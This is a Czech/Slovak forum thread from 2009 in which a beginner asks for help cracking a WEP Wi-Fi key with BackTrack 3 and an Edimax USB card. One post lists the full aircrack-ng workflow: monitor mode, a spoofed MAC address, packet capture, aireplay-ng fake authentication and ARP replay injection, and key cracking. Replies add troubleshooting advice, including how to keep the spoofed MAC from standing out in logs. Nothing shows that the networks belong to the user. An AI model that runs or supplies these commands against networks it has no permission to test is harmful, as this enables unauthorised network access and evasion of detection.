Edimax EW-7318USg - VMwareBackTrack 3 USB

Nezařazené
Odpovědět
cerv
Level 0

23 úno 2009, 16:27

Dobry den, prajem. Chcem sa Vas spytat.. sietovku v notase (HP Compaq nx6325) mam s čipom Broadcom bcm943111mcag, VMWare - Backtrack 3. Operačný systém nedetekuje sieťoú kartu. Čo som čítal na fóre tak ostatnym robilo to iste. Mám na USB bootovanu versiu BackTrack 3. Spúšťam ju pri štarte notebooku cez v USB boot menu. Nielenže vo VMWare nieje vidieť sieťovú kartu ale nefunguje ani v programoch ako Cain & Abel. Na USB boot BackTrack (WEP crack) som postupoval podľa návodu blip.tv/file/930698 no pri poslednych krokoch (odchytávanie paketov) mi napisalo chybu. Aj možnosti (zla BSSID, packej injektion atd).. Skúšal som to 2x čiže iná chyba ako je packet injection nieje.

Kamoš mal tiež Broadcom a vravel ze je to sietovka na *** :) as potrebujem novú wifi kartu - v mojom prípade som objednal Edimax EW-7318USg - uznávana wifi karta tu na fore. Ale pytam sa. Mam inšatalovaný Windows a BackTrack (mám len na USB slot) čize nemám inštalovaný na pevnom disku Linux: Dám ovládače na Windows disk a potom mi BackTrack na USB prečíita ten ovládač a pojde mi odchytávať pakety?

Ako si budem prepínat v BackTracku sieťovky? Alebo aky postup mam zadat aby mi ten BackTrack načíital siťetovku? Diky este raz.

cocaine
Level 7

23 úno 2009, 16:45

Ovládač pro wifi kartu Edimax je přímo ve VMware obrazu který použiješ pro start BackTracku ve virtuálním stroji.. Stačí ve virtuálu zapnout podporu (pokud nefunguje) pro USB zařízení a všechno co pak strčíš do USB slotu uvidíš ve VMware BackTracku.
Jednou deset minut a ušetříš hodiny

cerv
Level 0

23 úno 2009, 16:53

Čiže USB kartu zapojím a automaticky bude detekovaná a pojde mi prelomit WEP s VMware BackTrack? Kde sa zapina podpora ? :)

cocaine
Level 7

23 úno 2009, 17:04

Pokud nevíš jak se ovláda program pak začínáš ze špatného konce. VMware ma vlastní web kde můžeš žádat o podporu.

pacho
Level 0

23 úno 2009, 17:56

Ak myslíš Backtrack 3 USB verziu, tak normálne naloguješ systém, a v príkazovom riadku napises príkaz:
airomon-ng start rausb0
a tým zapneš kartu do monitor modu. POtom možeš robiť injektáž alebo odchytávanie paketov. Sám mám tu kartu a všetko s ňou šlape parádne.

EDIT: len pri tejto verzii backtracku odporúčam spraviť jednu partíciu a nastaviť backtrack tak, aby všetky zmeny ukladal tam. Ja tiež prave natom pracujem.

Ano mam, pozri si profil. Ale uprav si svoj príspevok, lebo ho zmažu. Kedže si porušil pravidlá. Nesmieš citovať posledný príspevok a všimol som si, že sa nesmie žiadať ani kontakt na userov. Pre istotu si poriadne preštuduj pravidlá. Hovorim z vlastnej skusenosti.

Preštuduj si pravidlá. Za prve: nesmieš citovať posledný prispevok, za dalšie: nesmieš prispevať viackrát po sebe, ale musíš použiť funkciu EDIT a tým editovat svoj posledný príspevok. ICQ mam v profile, pridal som ho tam. Takže si to poupravuj.
D-link G520 revize B3, chipset Atheros AR 2414A, Edimax EW 7318USg, chipset RT73, Ovislink WAI-101 10dBi indoor vsesmerova

cerv
Level 0

25 úno 2009, 22:00

Kartu mam uz doma, no niesom nadseny. Na backtracku 3 USB wifi karta v aplikáciach fungovala. Scan siete, ale ked som skusal crack pomocou tychto prikazov (pozri video) blip.tv/file/930698/

Kód: Vybrat vše

Vyhladanie WIFI sieti  - kanal .. 
-airmon-ng
-airmon-ng stop interface
-ifconfig interface down
=macchanger  --mac 00:11:22:33:44:55 interface
-airmon-ng start interface (wait for while to mode enable)
-airodump-ng interface
(push CONTROL and C together)
(copy BSSID)
-airodump-ng -c (number of channel) -w wep123 --bssid (bssid) interface
(new window)
-aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) interface
-aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 interface
(minimalize, 14000 data)
(new window)
-aircrack-ng -n 64 -b (bssid) wep123-01.cap
V aireplay-ng mi vsetko stroskotalo (problem s paketami) a napisalo mi mozne chyby ako zla Mac, zlý kanál, karta nepodporuje injection (mam edimax 7318usg) , karta je na inom kanáli, atd.neviem co dalej .. poradte alebo mi dajte nejaky iny sposob (najlepsie prikazy ) tento sposob by mal fungovat aj inym tak vyskusajte pls som v tom laik, diky za rychle a pomocne odpovede :)
Naposledy upravil(a) cerv dne 25 úno 2009, 22:02, celkem upraveno 1 x.

cocaine
Level 7

26 úno 2009, 00:01

Myslím, že ve tvém postu nevidím nejdůležitější věc.. t.z verze ovládače.

Michal
Level 7

26 úno 2009, 15:24

V tom zápise je trocha chaos, rovnako ako v tvojom popise postupu - "vsetko stroskotalo". Pvým krokom by mal byť test injekcie!. Meniť MAC adresu bezdrôtovej karty na 00:11:22:33:44:55 nie je nutné a je to "do očí bijúce" pri prehliadaní logu. Autor videa vopred vedel že ide o 64 bitový kľúč, čo v reále vopred isté nie je. Aireplay-ng -3 (standard ARP-request replay) nie je jediný spôsob útoku voči bezdrôtovej sieti chránenej Wep kľúčom. Ak zlyhala asociácia s prístupovým bodom, čo sa pravdepodobne stalo, použi iné metódy. (man aireplay-ng)

Odpovědět
  • Informace